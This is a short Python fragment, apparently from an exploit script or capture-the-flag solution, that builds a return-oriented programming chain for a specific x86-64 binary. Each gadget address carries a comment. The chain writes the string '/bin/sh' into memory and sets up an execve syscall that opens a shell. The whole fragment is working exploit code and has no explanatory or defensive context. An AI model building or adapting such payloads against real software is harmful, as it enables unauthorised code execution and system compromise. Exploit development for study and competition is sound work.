payload = p64(0x4131cf)
#0x00000000004131cf: pop rdx; ret; 
payload += p64(0x507070)+p64(0x481280)
# 0x0000000000481280: pop rdi; ret 3; 
payload += p64(0x68662f6e69622f)+p64(0x4510db)+"\x00"*3
# 0x00000000004510db: mov qword ptr [rdx], rdi; ret; 
payload += p64(0x40d343)
# 0x000000000040d343: pop rax; ret; 
payload += p64(0x3b)+p64(0x481280)
# 0x0000000000481280: pop rdi; ret 3; 
payload += p64(0x507070)+p64(0x416ee5)+"\x00"*3
# 0x0000000000416ee5: pop rsi; ret; 
payload += p64(0x0)+p64(0x4131cf)
# 0x00000000004131cf: pop rdx; ret; 
payload += p64(0x0)+p64(0x4094fc)
# 0x00000000004094fc: syscall; 
payload += b''
